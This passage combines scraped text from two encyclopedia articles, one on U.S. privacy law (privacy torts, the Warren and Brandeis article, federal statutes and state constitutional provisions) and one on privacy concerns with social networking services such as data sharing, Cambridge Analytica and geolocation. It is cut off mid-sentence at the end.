Privacy laws of the United Statesdeal with several differentlegalconcepts. One is theinvasion of privacy, atortbased in common law allowing an aggrieved party to bring a lawsuit against an individual who unlawfully intrudes into their private affairs, discloses their private information, publicizes them in a false light, or appropriates their name for personal gain.[1] The essence of the law derives from aright to privacy, defined broadly as "the right to be let alone". It usually excludes personal matters or activities which may reasonably be of public interest, like those of celebrities or participants in newsworthy events. Invasion of the right to privacy can be the basis for a lawsuit for damages against the person or entity violating the right. These include theFourth Amendmentright to be free of unwarranted search or seizure, theFirst Amendmentright to free assembly, and theFourteenth Amendmentdue process right, recognized by theSupreme Court of the United Statesas protecting a general right to privacy within family, marriage, motherhood, procreation, and child rearing.[2][3] Attempts to improve consumer privacy protections in the U.S. in the wake of the2017 Equifax data breach, which affected 145.5 million U.S. consumers, failed to pass in Congress.[4] The early years in the development of privacy rights began withEnglish common law, protecting "only the physical interference of life and property".[5]The Castle doctrine analogizes a person's home to their castle – a site that is private and should not be accessible without permission of the owner. The development of tort remedies by the common law is "one of the most significant chapters in the history of privacy law".[6]Those rights expanded to include a "recognition of man's spiritual nature, of his feelings and his intellect." Eventually, the scope of those rights broadened even further to include a basic "right to be let alone," and the former definition of "property" would then comprise "every form of possession – intangible, as well as tangible." By the late 19th century, interest in privacy grew as a result of the growth of print media, especially newspapers.[6] Between 1850 and 1890, U.S. newspaper circulation grew by 1,000 percent – from 100 papers with 800,000 readers to 900 papers with more than 8 million readers.[6]In addition, newspaper journalism became more sensationalized, and was termedyellow journalism. The growth of industrialism led to rapid advances in technology, including the handheld camera, as opposed to earlierstudio cameras, which were much heavier and larger. In 1884,Eastman Kodakcompany introduced theirKodak Brownie, and it became amass marketcamera by 1901, cheap enough for the general public. This allowed people and journalists to take candid snapshots in public places for the first time. Privacy was dealt with at the state level. For example,Pavesich v. New England Life Insurance Company(in 1905) was one of the first specific endorsements of the right to privacy as derived fromnatural lawin US law. Judith Wagner DeCew stated, "Pavesichwas the first case to recognize privacy as a right in tort law by invoking natural law, common law, and constitutional values."[7] Samuel D. WarrenandLouis D. Brandeis, partners in a new law firm, feared that this new small camera technology would be used by the "sensationalistic press." Seeing this becoming a likely challenge to individual privacy rights, they wrote the "pathbreaking"[6]Harvard Law Reviewarticle in 1890, "The Right to Privacy".[8]According to legal scholarRoscoe Pound, the article did "nothing less than add a chapter to our law",[9]and in 1966 legal textbook author,Harry Kalven, hailed it as the "most influential law review article of all".[6]In the Supreme Court case ofKyllo v. United States, 533 U.S. 27 (2001), the article was cited by a majority of justices, both those concurring and those dissenting.[6] The development of the doctrine regarding the tort of "invasion of privacy" was largely spurred by the Warren and Brandeis article, "The Right to Privacy". In it, they explain why they wrote the article in its introduction: "Political, social, and economic changes entail the recognition of new rights, and the common law, in its eternal youth, grows to meet the demands of society".[8]More specifically, they also shift their focus on newspapers: The press is overstepping in every direction the obvious bounds of propriety and of decency. Gossip is no longer the resource of the idle and of the vicious, but has become a trade, which is pursued with industry as well as effrontery. To satisfy a prurient taste the details of sexual relations are spread broadcast in the columns of the daily papers. ... The intensity and complexity of life, attendant upon advancing civilization, have rendered necessary some retreat from the world, and man, under the refining influence of culture, has become more sensitive to publicity, so that solitude and privacy have become more essential to the individual; but modern enterprise and invention have, through invasions upon his privacy, subjected him to mental pain and distress, far greater than could be inflicted by mere bodily injury.[8] They then clarify their goals: "It is our purpose to consider whether the existing law affords a principle which can properly be invoked to protect the privacy of the individual; and, if it does, what the nature and extent of such protection is".[8] Warren and Brandeis write that privacy rights should protect both businesses and private individuals. They describe rights intrade secretsand unpublished literary materials, regardless whether those rights are invaded intentionally or unintentionally, and without regard to any value they may have. For private individuals, they try to define how to protect "thoughts, sentiments, and emotions, expressed through the medium of writing or of the arts". They describe such things as personal diaries and letters needing protection, and how that should be done: "Thus, the courts, in searching for some principle upon which the publication of private letters could be enjoined, naturally came upon the ideas of abreach of confidence, and of animplied contract". They also define this as a breach of trust, where a person has trusted that another will not publish their personal writings, photographs, or artwork, without their permission, including any "facts relating to his private life, which he has seen fit to keep private". And recognizing that technological advances will become more relevant, they write: "Now that modern devices afford abundant opportunities for the perpetration of such wrongs without any participation by the injured party, the protection granted by the law must be placed upon a broader foundation".[8] There have been many laws related to privacy and data protection in recent years that have been enforced as a result of the rapid technological advancements. However, critics and scholars have argued that these guidelines are usually focused on legal factors, rather than technical details, which make it difficult for engineers and developers to ensure that new designs meet the guidelines stated in privacy laws.[10] In the United States,"invasion of privacy" is a commonly usedcause of actionin legalpleadings. Moderntort law, as first categorized byWilliam Prosser, includes four categories of invasion of privacy:[11] Intrusion of solitude occurs where one person intrudes upon the private affairs of another. In a famous case from 1944, authorMarjorie Kinnan Rawlingswas sued by Zelma Cason, who was portrayed as a character in Rawlings' acclaimed memoir,Cross Creek.[12]TheFlorida Supreme Courtheld that a cause of action for invasion of privacy was supported by the facts of the case, but in a later proceeding found that there were no actual damages. Intrusion upon seclusionoccurs when a perpetrator intentionally intrudes, physically, electronically, or otherwise, upon the private space, solitude, or seclusion of a person, or the private affairs or concerns of a person, by use of the perpetrator's physical senses or by electronic device or devices to oversee or overhear the person's private affairs, or by some other form of investigation, examination, or observation intrude upon a person's private matters if the intrusion would be highly offensive to a reasonable person. Hacking into someone else's computer is a type of intrusion upon privacy,[13]as is secretly viewing or recording private information by still or video camera.[14]In determining whether intrusion has occurred, one of three main considerations may be involved:expectation of privacy; whether there was an intrusion, invitation, or exceedance of invitation; or deception, misrepresentation, or fraud to gain admission. Intrusion is "an information-gathering, not a publication, tort ... legal wrong occurs at the time of the intrusion. No publication is necessary".[15] Restrictions against the invasion of privacy encompasses journalists as well: The First Amendment has never been construed to accord newsmen immunity from torts or crimes committed during the course of newsgathering. The First Amendment is not a license to trespass, to steal, or to intrude by electronic means into the precincts of another's home or office.[15][16] Public disclosure of private facts arises where one person reveals information which is not of public concern, and the release of which would offend a reasonable person.[17]"Unlike libel or slander, truth is not a defense for invasion of privacy."[13]Disclosure of private facts includes publishing or widespread dissemination of little-known, private facts that are non-newsworthy, not part of public records, public proceedings, not of public interest, and would be offensive to a reasonable person if made public.[15] False light is alegalterm that refers to atortconcerningprivacythat is similar to the tort ofdefamation. For example, the privacy laws in the United States include anon-public person'sright to privacy frompublicitywhich creates an untrue or misleading impression about them. A non-public person's right to privacy from publicity is balanced against theFirst Amendmentright offree speech. False lightlawsare "intended primarily to protect theplaintiff'smentaloremotionalwell-being".[18]If apublicationofinformationisfalse, then a tort ofdefamationmight have occurred. If thatcommunicationis nottechnicallyfalse but is stillmisleading, then a tort of false light might have occurred.[18] The specific elements of the Tort of false light vary considerably even among thosejurisdictionswhich do recognize this tort. Generally, these elements consist of the following: Thus in general, the doctrine of false light holds: One who gives publicity to a matter concerning another before the public in a false light is subject to liability to the other for invasion of privacy, if (a) the false light in which the other was placed would be highly offensive to a reasonable person, and (b) the actor had knowledge of or acted in a reckless disregard as to the falsity of the publicized matter and the false light in which the other would be placed.[19] For this wrong, money damages may be recovered from the first person by the other. At first glance, this may appear to be similar todefamation(libel and slander), but the basis for the harm is different, and the remedy is different in two respects. First, unlike libel and slander, no showing of actual harm or damage to the plaintiff is usually required in false light cases, and the court will determine the amount of damages. Second, being a violation of a Constitutional right of privacy, there may be no applicable statute of limitations in some jurisdictions specifying a time limit within which period a claim must be filed. Consequently, although it is infrequently invoked, in some cases false light may be a more attractive cause of action for plaintiffs than libel or slander, because the burden of proof may be less onerous. What does "publicity" mean? A newspaper of general circulation (or comparable breadth) or as few as 3–5 people who know the person harmed? Neither defamation nor false light has ever required everyone in society be informed by a harmful act, but the scope of "publicity" is variable. In some jurisdictions, publicity "means that the matter is made public, by communicating it to the public at large, or to so many persons that the matter must be regarded as substantially certain to become one of public knowledge."[20] Moreover, the standards of behavior governing employees of government institutions subject to a state or national Administrative Procedure Act (as in the United States) are often more demanding than those governing employees of private or business institutions like newspapers. A person acting in an official capacity for a government agency may find that their statements are not indemnified by the principle of agency, leaving them personally liable for any damages. Example: If someone's reputation was portrayed in a false light during a personnel performance evaluation in a government agency or public university, one might be wronged if only a small number initially learned of it, or if adverse recommendations were made to only a few superiors (by a peer committee to department chair, dean, dean's advisory committee, provost, president, etc.). Settled cases suggest false light may not be effective in private school personnel cases,[21]but they may be distinguishable from cases arising in public institutions. Although privacy is often a common-law tort, most states have enacted statutes that prohibit the use of a person's name or image if used without consent for the commercial benefit of another person.[22] Appropriation of name or likeness occurs when a person uses the name or likeness of another person for personal gain or commercial advantage. Action for misappropriation of right of publicity protects a person against loss caused by appropriation of personal likeness for commercial exploitation. A person's exclusive rights to control their name and likeness to prevent others from exploiting without permission is protected in similar manner to a trademark action with the person's likeness, rather than the trademark, being the subject of the protection.[13] Appropriation is the oldest recognized form of invasion of privacy involving the use of an individual's name, likeness, or identity without consent for purposes such as ads, fictional works, or products.[15] "The same action – appropriation – can violate either an individual's right of privacy or right of publicity. Conceptually, however, the two rights differ."[15] TheFair Credit Reporting Actbecame effective on April 25, 1971, and implemented limitations on the information that could be collected, stored, and utilized by agencies such as credit bureaus, tenant screenings, and health agencies. The law also defined the rights granted to individuals in regards to their financial information including the right to obtain a credit score; the right to know what information is in your financial file; the right to know when your information is being accessed and used; and the right to dispute any inaccurate or incorrect information.[23] TheVideo Privacy Protection Actof 1988 (VPPA) was signed into law by PresidentRonald Reaganto preserve the privacy of people's information collected when they rented, purchased, or delivered audio visual materials, and specifically videotapes.[24]The law arose out of theBork tapescontroversy surrounding theWashington City Paper's publication of a list of films rented byRobert Bork, aU.S. District of Columbia Circuit Court of AppealsJudge who had beennominated to fill a seat on the United States Supreme Courtat the time.[25]The law prohibits the disclosure of personal information collected by video tape service providers unless it falls under certain exceptions.[26]The VPPA became a focus of attention in the legal industry once again around 2022. Its revival came as part of a larger trend in consumerclass actionsfiled based on privacy law violations, both through new laws like theCalifornia Consumer Privacy Actand older laws like the VPPA and wiretapping statutes. Signed in law on August 21, 1996,Health Insurance Portability and Accountability Act(HIPAA) is a piece of legislation passed in the United States that limits the amount and types of information that can be collected and stored by healthcare providers. This includes limits on how that information can be obtained, stored, and released.[27]HIPAA also developed data confidentiality requirements that are a part of "The Privacy Rule."[28] TheGramm-Leach-Bliley Act(GLA) is a federal law that was signed into effect on November 12, 1999. This act placed increased limits and requirements for data collection by financial institutions, as well as limited how that information could be collected and stored. It focused on requiring financial institutions to take specific measure to increase the safety and confidentiality of the information being collected. In addition to this, the law also put limitations on what type of data could be collected by financial institutions and how they could use that information.[27]The act strives to protect NPI, or nonpublic personal information, which is any information that is collected regarding an individual's finances that is not otherwise publicly available.[28] TheChildren's Online Privacy Protection Act(COPPA), passed on April 21, 2000, is a federal law in the United States that puts severe restrictions on what data companies can collect, share, or sell about children who are under the age of 13.[29]A core provision under COPPA is that a website operator must "obtain verifiable parental consent before any collection, use, or disclosure of personal information from children."[30] Although the word "privacy" is actually never used in the text of theUnited States Constitution,[31]there are Constitutional limits to the government's intrusion into individuals' right to privacy. This is true even when pursuing a public purpose such as exercising police powers or passing legislation. The Constitution, however, only protects againststate actors. Invasions of privacy by individuals can only be remedied under previous court decisions. TheFirst Amendmentprotects the right to free assembly, broadening privacy rights. TheFourth Amendment to the Constitution of the United Statesensures that "the right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized." The Fourth Amendment was theFramers' attempt to protect each citizen's spiritual and intellectual integrity.[citation needed]A government that violates the Fourth Amendment in order to use evidence against a citizen is also violating theFifth Amendment.[32]TheNinth Amendmentdeclares that "The enumeration in the Constitution, of certain rights, shall not be construed to deny or disparage others retained by the people." TheSupreme Courthas interpreted theFourteenth Amendmentas providing a substantive due process right to privacy. This was first affirmed by several Supreme Court Justices inGriswold v. Connecticut, a 1965 decision protecting a married couple's rights to contraception. InRoe v. Wade(1973), the Supreme Court invoked a "right to privacy" as creating a right to an abortion, sparking a lasting nationwide debate on the meaning of the term "right to privacy". InLawrence v. Texas(2003), the Supreme Court invoked the right to privacy regarding the sexual practices of same-sex couples. However, due toDobbs v. Jackson Women's Health Organization(2022) breaking many precedents set byGriswoldandRoe, the privacy interpretations brought about specifically by these cases are currently of ambiguous legal force.[citation needed] On August 22, 1972, the Alaska Right of Privacy Amendment, Amendment 3, was approved with 86% of the vote in support of the legislatively referred constitutional amendment.[33]Article I, Section 22 of Alaska's constitution states, "The right of the people to privacy is recognized and shall not be infringed. The legislature shall implement this section."[34] TheCalifornia Constitutionarticulates privacy as aninalienable right.[35] CA SB 1386 expands on privacy law and guarantees that if a company exposes a Californian's sensitive information this exposure must be reported to the citizen. This law has inspired many states to come up with similar measures.[36] California's"Shine the Light" law(SB 27, CA Civil Code § 1798.83), operative on January 1, 2005, outlines specific rules regarding how and when a business must disclose use of a customer'spersonal informationand imposes civil damages for violation of the law. California's Reader Privacy Act was passed into law in 2011.[37]The law prohibits a commercial provider of a book service, as defined, from disclosing, or being compelled to disclose, any personal information relating to a user of the book service, subject to certain exceptions. The bill would require a provider to disclose personal information of a user only if a court order has been issued, as specified, and certain other conditions have been satisfied. The bill would impose civil penalties on a provider of a book service for knowingly disclosing a user's personal information to a government entity in violation of these provisions. This law is applicable to electronic books in addition to print books.[38] The California Privacy Rights Act created theCalifornia Privacy Protection Agency, the first data protection agency in the United States.[39][40] Article I, §23 of theFlorida Constitutionstates that "Every natural person has the right to be let alone and free from governmental intrusion into the person's private life except as otherwise provided herein. This section shall not be construed to limit the public's right of access to public records and meetings as provided by law."[41] Article 2, §10 of theMontana Constitutionstates that "The right of individual privacy is essential to the well-being of a free society and shall not be infringed without the showing of a compelling state interest".[42] Article 1, §7 of theWashington Constitutionstates that "No person shall be disturbed in his private affairs, or his home invaded, without authority of law".[43] The right to privacy is protected also by more than 600 laws in the states and by a dozen federal laws, like those protecting health and student information, also limiting electronic surveillance.[46] As of 2022 however, only five states had data privacy laws.[47] Several of the US federal privacy laws have substantial "opt-out" requirements, requiring that the individual specifically opt-out of commercial dissemination ofpersonally identifiable information (PII). In some cases, an entity wishing to "share" (disseminate) information is required to provide a notice, such as aGLBAnotice or aHIPAAnotice, requiring individuals to specifically opt-out.[48]These "opt-out" requests may be executed either by use of forms provided by the entity collecting the data, with or without separate written requests. The Health Information Technology for Economic and Clinical Health Act (HITECH Act) is an important piece of legislation in the United States that relates to the privacy of health-related information. Enacted as part of the American Recovery and Reinvestment Act of 2009, the HITECH Act addresses the privacy and security concerns associated with the electronic transmission of health information.
https://en.wikipedia.org/wiki/Privacy_laws_of_the_United_States
Since the arrival of earlysocial networking sitesin the early 2000s, onlinesocial networking platformshave expanded exponentially, with the biggest names insocial mediain the mid-2010s beingFacebook,Instagram,TwitterandSnapchat. The massive influx of personal information that has become available online and stored in the cloud has put user privacy at the forefront of discussion regarding the database's ability to safely store such personal information. The extent to which users and social media platform administrators can access user profiles has become a new topic of ethical consideration, and the legality, awareness, and boundaries of subsequent privacy violations are critical concerns in advance of the technological age.[1] Asocial networkis asocial structuremade up of a set ofsocial actors(such as individuals or organizations), sets of dyadic ties, and othersocial interactionsbetween actors.Privacy concerns with social networking servicesis a subset ofdata privacy, involving the right of mandating personalprivacyconcerning storing, re-purposing, provision to third parties, and displaying of information pertaining to oneself via the Internet. Social network security and privacy issues result from the large amounts of information these sites process each day. Features that invite users to participate in—messages, invitations, photos, openplatformapplications and other applications are often the venues for others to gain access to a user's private information. In addition, the technologies needed to deal with user's information may intrude their privacy. The advent of theWeb 2.0has causedsocial profilingand is a growing concern forinternet privacy.[2]Web 2.0 is the system that facilitates participatory information sharing and collaboration on the Internet, in social networking media websites likeFacebookandMySpace.[2]These social networking sites have seen a boom in their popularity beginning in the late 2000s. Through these websites many people are giving their personal information out on the internet. These social networks keep track of all interactions used on their sites and save them for later use.[3]Issues includecyberstalking, location disclosure, social profiling, third party personal information disclosure, and governmentuse of social network websites in investigationswithout the safeguard of asearch warrant. Before social networking sites exploded over the past decade, there were earlier forms of social networking that dated back to 1997 such asSix DegreesandFriendster. While these two social media platforms were introduced, additional forms of social networking included: online multiplayer games, blog and forum sites, newsgroups, mailings lists and dating services. They created a backbone for the new modern sites. Since the start of these sites, privacy has become a concern for the public. In 1996, a young woman inNew York Citywas on a first date with an online acquaintance and later sued for sexual harassment after her date tried to play out some of the sexual fantasies they had discussed while online. This is just an early example of many more issues to come regarding internet privacy.[4] In the past, social networking sites primarily consisted of the capability to chat with others in a chat room, which was far less popular than social networks today. People using these sites were seen as "techies" unlike users in the current era. One of the early privacy cases was in regards toMySpace, due to "stalking of minors, bullying, and privacy issues", which inevitably led to the adoption of "age requirements and other safety measures".[5]It is very common in society now for events such as stalking and "catfishing" to occur. According to Kelly Quinn, “the use of social media has become ubiquitous, with 73% of all U.S. adults using social network sites today and significantly higher levels of use among young adults and females." Social media sites have grown in popularity over the past decade, and they only continue to grow. A majority of the United States population uses some sort of social media site.[6] There are several causes that contribute to theinvasion of privacythroughout social networking platforms. It has been recognized that “by design, social media technologies contest mechanisms for control and access to personal information, as the sharing of user-generated content is central to their function." This proves that social networking companies need private information to become public so their sites can operate. They require people to share and connect with each other.[6]This may not necessarily be a bad thing; however, one must be aware of the privacy concerns. Even withprivacy settings, posts on the internet can still be shared with people beyond a user's followers or friends. One reason for this is that “English law is currently incapable of protecting those who share on social media from having their information disseminated further than they intend." Information always has the chance to be unintentionally spread online. Once something is posted on the internet, it becomes public and is no longer private. Users can turn privacy settings on for their accounts; however, that does not guarantee that information will not go beyond their intended audience. Pictures and posts can be saved and posts may never really get deleted. In 2013, thePew Research Centerfound that "60% of teenage Facebook users have private profiles.” This proves that privacy is definitely something that people still wish to obtain.[7] A person's life becomes much more public because of social networking. Social media sites have allowed people to connect with many more people than with just in person interactions. People can connect with users from all across the world that they may never have the chance to meet in person. This can have positive effects; however, this also raises many concerns about privacy. Information can be posted about a person that they do not want getting out. In the bookIt's Complicated, the author, Danah Boyd, explains that some people “believe that a willingness to share in public spaces—and, most certainly, any act of exhibitionism and publicity—is incompatible with a desire for personal privacy." Once something is posted on the internet, it becomes accessible to multiple people and can even be shared beyond just assumed friends or followers. Many employers now look at a person's social media before hiring them for a job or position. Social media has become a tool that people use to find out information about a person's life. Someone can learn a lot about a person based on what they post before they even meet them once in person. The ability to achieve privacy is a never ending process. Boyd describes that “achieving privacy requires the ability to control the social situation by navigating complex contextual cues, technical affordances, and social dynamics." Society is constantly changing; therefore, the ability to understand social situations to obtain privacy regularly has to be changed.[8] Social networking sites vary in the levels of privacy offered. For some social networking sites like Facebook, providing real names and other personal information is encouraged by the site (onto a page known as a 'Profile'). This information usually consists of the birth date, current address, and telephone number(s). Some sites also allow users to provide more information about themselves such as interests, hobbies, favorite books or films, and even relationship status. However, there are other social network sites, such asMatch.com, where most people prefer to be anonymous. Thus, linking users to their real identity can sometimes be rather difficult. Nevertheless, individuals can sometimes be identified with face re-identification. Studies have been done on two major social networking sites, and it is found that by overlapping 15% of the similar photographs, profile pictures with similar pictures over multiple sites can be matched to identify the users.[9] “According to research conducted by the Boston Consulting Group, privacy of personal data is a top issue for 76 percent of global consumers and 83 percent of U.S. consumers.”[10]Six-in-ten Americans (61%) have said they would like to do more to protect their privacy.[11] For sites that do encourage information disclosure, it has been noted that a majority of the users have no trouble disclosing their personal information to a large group of people.[9]In 2005, a study was performed to analyze data of 540 Facebook profiles of students enrolled atCarnegie Mellon University. It was revealed that 89% of the users gave genuine names, and 61% gave a photograph of themselves for easier identification.[9]Majority of users also had not altered their privacy setting, allowing a large number of unknown users to have access to their personal information (the default setting originally allowed friends, friends of friends, and non-friends of the same network to have the full view of a user's profile). It is possible for users to block other users from locating them on Facebook, but this must be done by individual basis, and would, therefore, appear not to be commonly used for a wide number of people. Most users do not realize that while they may make use of the security features on Facebook the default setting is restored after each update. All of this has led to many concerns that users are displaying far too much information on social networking sites which may have serious implications on their privacy. Facebook was criticized due to the perceived laxity regarding privacy in the default setting for users.[12] The“Privacy Paradox”is a phenomenon that occurs when individuals, who state that they have concerns about their privacy online, take no action to secure their accounts.[13]Furthermore, while individuals may take extra security steps for other online accounts, such as those related to banking or finance, this does not extend to social media accounts.[13]Some of these basic or simple security steps would include deleting cookies, browser history, or checking one's computer for spyware.[13]Some may attribute this lack of action to “third-person bias”. This occurs when people are aware of risks, but then do not believe that these risks apply or relate to them as individuals.[13]Another explanation is a simple risk reward analysis. Individuals may be willing to risk their privacy to reap the rewards of being active on social media.[13]Oftentimes, the risk of being exploited for the private information shared on the internet is overshadowed by the rewards of exclusively sharing personal information that bolsters the appeal of the social media user.[14] In the study by Van der Velden and El Emam, teenagers are described as “active users of social media, who seem to care about privacy, but who also reveal a considerable amount of personal information.”[15]This brings up the issue of what should be managed privately on social media, and is an example of thePrivacy Paradox. This study in particular looked at teenagers with mental illness and how they interact onsocial media. Researchers found that “it is a place where teenage patients stay up-to-date about their social life—it is not seen as a place to discuss their diagnosis and treatment.”[15]Therefore, social media is a forum that needs self-protection and privacy. Privacy should be a main concern, especially for teens who may not be entirely informed about the importance and consequences of public versus private use. For example, the “discrepancy between stated privacy concerns and the disclosure of private information.”[15] Users are often the targets as well as the source of information in social networking. Users leave digital imprints during browsing of social networking sites or services. It has been identified from few of the online studies, that users trust websites and social networking sites. As per trust referred,[16]"trust is defined in (Mayer, Davis, and Schoorman, 1995) as "the willingness of a party to be vulnerable to the actions of another party based on the expectation that the other will perform a particular action important to thetrustor, irrespective of the ability to monitor or control that other party" (p. 712)". A survey[17]was conducted by Carnegie Mellon University, a majority of users provided their living city, phone numbers among other personal information, while user is clearly unaware of consequences of sharing certain information. Adding to this insight, is the social networking users are from various cities, remote villages, towns, cultures, traditions, religions, background, economic classes, education background, time zones and so on that highlight the significant gap in awareness. The survey results of the paper[17]suggest, "These results show that the interaction of trust and privacy concern in social networking sites is not yet understood to a sufficient degree to allow accurate modeling of behavior and activity. The results of the study encourage further research in the effort to understand the development of relationships in the online social environment and the reasons for differences in behavior on different sites." As per reference, a survey conducted among social networking users atCarnegie Mellon Universitywas indicative of following as reasons for lack of user awareness: 1) People's disregard of privacy risks due to trust in privacy and protection offered on social networking sites.2) Availability of user's personal details to third-party tools/applications.3) APIs and Frameworks also enable any user, who has the fair amount of knowledge to extract the user's data.4) Cross-site forgery and other possible website threats. There is hence a dire need for improving User's awareness swiftly, in order to address growing security and privacy concerns caused due to merely user's unawareness. Social networking sites themselves can take a responsibility and make such awareness possible by means of participatory methods by virtual online means.[18] To improve user's awareness, a possible method is to have privacy-related trainings for people to understand privacy concerns with the use of social media websites or apps.[19]The trainings can include information of how certain companies or apps help secure user's privacy, and skills to protect user's privacy.[19] Studies have also shown that privacy literacy plays a role in enhancing use of privacy protective measures and people that are concerned about privacy were less likely to online services and share personal information.[20] There are several ways for third parties to access user information. Flickr is an example of a social media website that providesgeotaggedphotos that allows users to view the exact location of where a person is visiting or staying. Geotagged photos make it easy for third party users to see where an individual is located or traveling to.[21]There is also growing use of phishing, which reveals sensitive information through secretive links and downloads through email, messages, and other communications. Social media has opened up an entirely new realm for hackers to get information from normal posts and messages.[22] Nearly all of the most popular applications on Facebook—including Farmville, Causes, and Quiz Planet—have been sharing users' information with advertising and tracking companies.[23]Even thoughFacebook's privacy policysays they can provide "any of the non-personally identifiable attributes we have collected"[24]to advertisers, they violate this policy. If a user clicked a specific ad in a page, Facebook will send the user address of this page to advertisers, which will directly lead to a profile page. In this case, it is easy to identify users' names.[25]For example, Take With Me Learning is an app that allows teachers and students to keep track of their academic process. The app requires personal information that includes, school name, user's name, email, and age. But Take With Me Learning was created by a company that was known for illegally gathering student's personal information without their knowledge and selling it to advertisement companies. This company had violated theChildren's Online Privacy Protection Act (COPPA), used to keep children safe from identity theft while using the internet.[26]Most recently, Facebook has been scrutinized for the collection of users' data byCambridge Analytica. Cambridge Analytica was collecting data from Facebook users after they agreed to take a psychology questionnaire. Not only could Cambridge Analytica access the data of the person who took the survey, they could also access all of the data of that person's Facebook friends. This data was then used to hopefully sway people's’ beliefs in hopes that they would vote for a certain politician. While what Cambridge Analytica did by collecting the data may or may not be illegal, they then transferred the data they acquired to third parties so that it could be used to sway voters.[27]Facebook was fined £500,000 in the UK, $5bn (£4bn) in the US, and in 2020, the company was taken to court by Australia's privacy regulator with the perspective of imposing a fine of A$1.7m (£860,000).[28] Application programming interface(API) is a set of routines, protocols, and tools for building software applications. By using query language, sharing content and data between communities and applications became much easier. APIs simplify all that by limiting outside program access to a specific set of features—often enough, requests for data of one sort or another. APIs clearly define exactly how a program will interact with the rest of the software world—saving time.[29] An API allows software to “speak with other software.”[30]Furthermore, an API can collect and provide information that is not publicly accessible. This is extremely enticing for researchers due to the greater number of possible avenues of research.[30]The use of an API for data collection can be a focal point of the privacy conversation, because while the data can be anonymous, the difficulty is understanding when it becomes an invasion of privacy.[30]Personal information can be collected in mass, but the debate over whether it breaches personal privacy is due to the inability to match this information with specific people.[30] There have however been some concerns with API because of the recent scandal between Facebook and the political consulting firm,Cambridge Analytica.What happened was “Facebook allowed a third-party developer to engineer an application for the sole purpose of gathering data. And the developer was able to exploit a loophole to gather information on not only people who used the app but all their friends — without them knowing.”[31] In 2020, critics praised Apple and Google for their contact tracing API that had technical specifications that were conscious of privacy concerns.[32] Search enginesare an easy way to find information without scanning every site yourself. Keywords that are typed into a search box will lead to the results. So it is necessary to make sure that the keywords typed are precise and correct. There are many such search engines, some of which may lead the user to fake sites which may obtain personal information or are laden with viruses. Furthermore, some search engines, likeDuckDuckGo, will not violate the user's privacy.[33] On most social media websites, user's geographical location can be gathered either by users (through voluntary check-in applications like Foursquare and Facebook Places) or by applications (through technologies like IP address geolocation, cellphone network triangulation, RFID and GPS). The approach used matters less than the result which holds that the content produced is coupled with the geographical location where the user produced it. Additionally, many applications attach the contents of other forms of information like OS language, device type and capture time. The result is that by posting, tweeting or taking pictures, users produce and share an enormous amount of personal information.[34] Many large platforms reveal a part of a user's email address or phone number when using the'forgotten password' function. Often the whole email address can be derived from this hint and phone digits can be compared with known numbers.[35] By using this accessible data along withdata miningtechnology, users' information can be used in different ways to improvecustomer service. According your retweets, likes, andhashtags, Twitter can recommend some topics and advertisements. Twitter's suggestions for whom to follow[36]are done by thisrecommendation system. Commerce, such asAmazon, make use of users' information to recommend items for users. Recommendations are based on at least prior purchases, shopping cart, and wishlist.Affinity analysisis a data mining technique that used to understand the purchase behavior of customers. By usingmachine learningmethod, whether a user is a potential follower of Starbucks can be predicted.[37]In that case, it is possible to improve the quality and coverage of applications. In addition, user profiles can be used to identify similar users. According toGary Kovacs's speech about Tracking our online trackers, when he used the internet to find an answer to a question, "We are not even 2 bites into breakfast and there are already nearly 25 sites that are tracking me", and he was navigated by 4 of them.[38] Studies have shown that people's belief in the right to privacy is the most pivotal predictor in their attitudes concerning online privacy.[39] ThePrivacy Act of 1974(aUnited States federal law) states: Disclosure in this context refers to any means of communication, be it written, oral, electronic or mechanical. This states that agencies are forbidden to give out, or disclose, the information of an individual without being given consent by the individual to release that information. However, it falls on the individual to prove that a wrongful disclosure, or disclosure in general, has occurred.[40]Because of this social networking sites such as Facebook ask for permission when a third-party application is requesting the user's information. Although ThePrivacy Act of 1974does a lot to limit privacy invasion through third party disclosure, itdoeslist a series of twelve exceptions that deem disclosure permissible: Social profiling allows for Facebook and other social networking media websites of filtering through the advertisements, assigning specific ones to specific age groups, gender groups, and even ethnicities.[2] Data aggregation sites likeSpokeohave highlighted the feasibility of aggregating social data across social sites as well as integrating it with public records. A 2011 study[41]highlighted these issues by measuring the amount of unintended information leakage over a large number of users with the varying number of social networks. It identified and measured information that could be used in attacks against what-you-know security. Studies[42][43]have also pointed to most social networks unintentionally providing third party advertising and tracking sites with personal information. It raises the issue of private information inadvertently being sent to third party advertising sites via Referrer strings or cookies. Civil libertarians worry that social networking sites, particularlyFacebook, have greatly diminished user confidentiality in numerous ways.[44]For one thing, when social media platforms store private data, they also have complete access to that material as well. To sustain their profitability, applications like Facebook examine and market personal information by logging data throughcookies, small files that stockpile the data on someone's device. Companies, such as Facebook, carry extensive amounts of private user information on file, regarding individuals’, “likes, dislikes, and preferences”, which are of high value to marketers.[45]As Facebook reveals user information to advertising and marketing organizations, personalized endorsements will appear on news feeds based on “surfing behavior, hobbies, or pop culture preferences”.[44]For those reasons, Facebook's critics fear that social networking companies may seek business ventures with stockholders by sharing user information in the exchange of profits. Additionally, they argue that since Facebook demonstrates an illusion of privacy presented by a “for-friends-only” type of platform, individuals find themselves more inclined to showcase more personal information online. According to the critics, users might notice that the sponsorships and commercials are tailored to their disclosed private data, which could result in a sense of betrayal.[44] A number of institutions have expressed concern over the lack of privacy granted to users on social networking sites. These includeschools,libraries, and Government agencies.[46] Libraries in the particular, being concerned with the privacy of individuals, have debated on allowing library patrons to access social networking sites on public library computers. While only 19% of librarians reportedly express real concern over social networking privacy, they have been particularly vocal in voicing their concerns.[47]Some have argued that the lack of privacy found on social networking sites is contrary to the ethics supported by Library organizations, and the latter should thus be extremely apprehensive about dealing with the former.[47]Supporters of this view present their argument from the code of ethics held by both theAmerican Library Associationand the UK basedChartered Institute of Library and Information Professionals, which affirms a commitment to upholding privacy as a fundamental right.[47]In 2008, a study was performed in fourteen public libraries in the UK which found that 50% blocked access to social networking sites.[48]Many school libraries have also blocked Facebook out of fear that children may be disclosing too much information on Facebook. However, as of 2011, Facebook has taken efforts to combat this concern by deleting profiles of users under the age of thirteen.[49] As there is so much information provided other things can be deduced, such as the person'ssocial security number, which can then be used as part ofidentity theft.[50]In 2009, researchers at Carnegie Mellon University published a study showing that it is possible to predict most and sometimes all of an individual's 9-digit Social Security number using information gleaned from social networks and online databases. (See Predicting Social Security Numbers from Public Data by Acquisti and Gross).[51]In response, various groups 